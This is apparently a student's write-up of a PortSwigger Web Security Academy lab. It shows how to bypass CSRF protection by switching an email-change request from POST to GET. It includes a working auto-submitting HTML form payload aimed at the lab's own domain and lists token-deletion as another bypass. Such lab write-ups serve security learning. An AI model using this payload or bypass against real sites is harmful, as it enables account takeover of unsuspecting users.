# Lab: CSRF where token validation depends on request method ###### tags: `Portswigger Web Security Academy` `Web` * Description: This lab's email change functionality is vulnerable to CSRF. It attempts to block CSRF attacks, but only applies defenses to certain types of requests. * Goal: To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address. You can log in to your own account using the following credentials: `wiener:peter` ## Recon 1. Login and update email to trace the package Like the previous lab, we first login to the website and update the email. At the same time, we can trace update email package shown below:  We can notice that the carried data including `csrf_token` 2. According to [从0到1完全掌握 CSRF](https://zhuanlan.zhihu.com/p/517735618) and [CSDN write up](https://blog.csdn.net/ZripenYe/article/details/120793710) :::info We know that using some technique can bypass this protection $\to$ 1. <font color="FF0000">**Delete `csrf_token` data**</font> 2. <font color="FF0000">**change `POST` method to `GET` method**</font> In this lab, we use the 2nd method to bypass CSRF :::  You can see that the response status is 302 which means it's a good way to forge a CSRF package ## Exp - Change POST to GET to bypass CSRF Follow the self-created package at previous lab Exploit Payload: ```javascript= <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://0a9700ef04043a66801b0d0e00d10084.web-security-academy.net/my-account/change-email?email=bernie6401%40gmail.com" method="GET"> <input type="hidden" name="email" value="danger&#64;gmail&#46;com" /> </form> <script> document.forms[0].submit(); </script> </body> </html> ``` :::spoiler Success Screenshot  ::: ## Reference [从0到1完全掌握 CSRF](https://zhuanlan.zhihu.com/p/517735618)